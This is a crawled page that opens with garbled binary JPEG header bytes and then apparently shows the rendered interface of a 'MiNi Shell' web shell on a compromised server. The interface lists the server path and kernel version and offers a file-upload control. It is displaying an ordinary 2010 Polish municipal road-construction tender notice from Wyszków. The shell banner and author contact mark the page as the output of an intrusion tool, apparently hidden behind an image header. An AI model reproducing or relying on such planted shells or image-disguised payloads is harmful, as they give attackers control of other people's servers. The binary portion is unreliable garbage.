JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100107/3819-N-2010.html

<p class="kh_header"><b>Wyszków: Budowa ulicy na osiedlu Centrum w Wyszkowie</b><br>
<b>Numer ogłoszenia: 3819 - 2010; data zamieszczenia: 07.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wyszków , Aleja Róż 2, 07-200 Wyszków, woj. mazowieckie, tel. 029 7424201, faks 029 7424209.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wyszkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ulicy na osiedlu Centrum w Wyszkowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Droga:
1.	Warstwa wzmacniająca grunt z geowłókniny o szer. 5m - 1.501,70m2;
2.	Nawierzchnia z kostki brukowej betonowej gr. 8cm (kolor grafitowy) na podbudowie z kruszyw łamanych, sortowanych frakcji 0-31,5mm gr. 20 cm, warstwie betonowej gr. 20 cm z betonu B-20 i podsypce cementowo - piaskowej gr. 3 - 5cm   z wypełnieniem spoin piaskiem - 1.501,70m 2;
3.	Krawężniki betonowe wystające o wym. 15x30cm z wykonaniem ław betonowych   z betonu B-15 z oporem na podsypce cementowo-piaskowej - 504,00m; 
4.	Znaki drogowe - 25szt.;
5.	Oznakowanie poziome farba chemoutwardzalną - 90m2;
6.	Poręcze ochronne łańcuchowe pojedyncze o rozstawie słupków z rur O60mm  co 2,5m - 125m; 

II. Chodniki:
1.	Chodniki z kostki brukowej betonowej gr. 6cm na podbudowie z kruszyw łamanych, sortowanych frakcji 0-31,5mm gr. 10cm i na podsypce cementowo - piaskowej  z wypełnieniem spoin piaskiem - 1.197,50m2 (kostki kolorowej - 167,50m2; kostki szarej - 1.030,00m2);
2.	Obrzeża betonowe o wym. 30x8cm na podsypce cementowo - piaskowej  z wypełnieniem spoin zaprawą cementową - 638,00m;

III. Odwodnienie:
1.	Kanalizacja deszczowa z rur O160mm - 184,00m;
2.	Studzienki kanalizacyjne O425 z osadnikiem, odejściem O160mm, rurą karbowaną i wpustem deszczowym - 22szt.;
3.	Włączenie do istniejącej kanalizacji deszczowej;

IV. Przyłącze do fontanny:
1.	Wykonanie podłączenia wody do fontanny - 1szt.;
2.	Przyłącza wodociągowe z rur z polietylenu o średnicy 50mm zakończone zaworem odcinającym - 15m;
3.	Włączenie do istniejącej sieci wodociągowej i kanalizacji deszczowej;
4.	Przyłącza kanalizacyjne z rur PVC O160mm - 15m;
5.	Studnia rewizyjna O1000mm z kręgów betonowych - studzienka wodomierzowa - 1szt.;
6.	Wodomierz wielostrumieniowyWS2 o śr. nominalnej 20mm - 1szt.;
7.	Zawory odcinające o śr. nominalnej 25m - 1szt.;

V. Zieleń i mała architektura:
1.	Ręczne rozścielenie ziemi urodzajnej z transportem taczkami na terenie płaskim gr. 15cm - 46,50m3;
2.	Wykonanie trawników dywanowych siewem na gruncie kat. III bez nawożenia - 310,00m2;
3.	Murki z klinkieru pełnego na zaprawie cementowo - wapiennej (89,60m2) na fundamentach zbrojonych w deskowaniu tradycyjnym (46,20m3);
4.	Ułożenie warstwy z geowłókniny w murkach - 160,00m2;
5.	Napełnienie murków ziemią urodzajną - 42,00m3;
6.	Obsadzenie murków roślinami kwietnikowymi jednorocznymi przy ilości 9szt.-m2 donicy - 83,00m2;
7.	Zakup i ustawienie ławek drewnianych dł. 2,0m i szer. 0,30m - 10szt.;
8.	Zakup i ustawieni koszy na śmieci wolnostojących - 8szt.;

VI. Oświetlenie:
1.	Montaż i stawianie słupów oświetleniowych typu SAL-4,5E Rosa- 18szt.;
2.	Montaż i stawianie słupów oświetleniowych typu SAL-6 E Rosa - 2szt.;
3.	Montaż wysięgników rurowych typu WA-5-1 - 18szt.;
4.	Montaż wysięgników rurowych typu WA-5-2 - 2szt.;
5.	Montaż opraw oświetleniowych na wysięgnikach - 22szt.;
6.	Dostawa i montaż skrzynki SON - 1szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.32.90-8, 45.23.32.22-1, 45.23.11.00-6, 45.11.27.10-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 15000 zł (piętnascie tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielnie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: 
a)   posiadania uprawnień do wykonywania działalności w zakresie objętym przedmiotem zamówienia tzn. prowadzą działalność gospodarczą w w/w zakresie zarejestrowaną   w Krajowym Rejestrze Sądowym lub innym organie ewidencji działalności gospodarczej,
b)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia z uwagi na okoliczności wskazane przepisami art. 24 ust. 1  ustawy Prawo zamówień publicznych,
c)	 posiadają niezbędną wiedzę i doświadczenie, tj. wykonali (rozpoczęli i zakończyli budowę) samodzielnie lub z udziałem podwykonawców w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zadania  o podobnym charakterze i złożoności tj. polegających na wykonaniu minimum nawierzchni z kostki brukowej o pow. 2700m2 w ramach jednego zadania.
 
d)	dysponują potencjałem technicznym do wykonania zamówienia tj.  co najmniej:
1.	koparka - 2 szt., 
2.	spycharka - 2 szt., 
3.	samochód samowyładowczy - 1szt.,
4.	urządzenie do zagęszczania - 2 szt.,
5.	podnośnik 1 szt.,
6.	żuraw samochodowy 1 szt.,
e)	dysponują personelem kierowniczym, który będzie uczestniczyć w realizacji zamówienia, tj. posiadającym uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie  w specjalnościach:
-   drogowej, 
-   instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
f)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

I.	Ocena spełniania w/w warunków zostanie przeprowadzona według formuły spełnia - nie spełnia, wyłącznie na podstawie oświadczeń i dokumentów wymienionych w § 6. SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił. Uzupełnienie wymaganych dokumentów nastąpi na wezwanie Zamawiającego  w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta wykonawcy podlegałaby odrzuceniu lub konieczne byłoby unieważnienie postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I.  W celu wykazania spełniania przez Wykonawcę warunków o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych   Wykonawcy dostarczą: 
1.	Wypełniony Formularz oferty (według załączonego wzoru),
2.	Oświadczenie o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych  oraz braku podstaw do wykluczenia Formularz nr 1,
3.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub KRUS, potwierdzonych odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem składania ofert.
6.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24                     ust. 1 pkt 9 ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7.	Kosztorys ofertowy  sporządzony metodą szczegółową.
8.	Wykaz wykonanych robót budowlanych w okresie pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie - odpowiadającym swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia (rozpoczętych i zakończonych) oraz dokumenty, że wykazane roboty zostały wykonane  zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone Formularz Nr 2.
9.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych oraz informacją o podstawie do dysponowania tymi osobami. Oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia  posiadają wymagane uprawnienia. Formularz nr 3
10.	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń technicznych, dostępnych wykonawcy w celu realizacji zamówienia  wraz z informacją o podstawie dysponowania tymi zasobami Formularz Nr 4.
11.	Dowód wniesienia wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wyszkow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Wyszkowie
ul. Aleja Róż 2, 07-200 Wyszków pok. 116A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2010 godzina 11:00, miejsce: Urząd Miejski w Wyszkowie
ul. Aleja Róż 2, 07-200 Wyszków.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com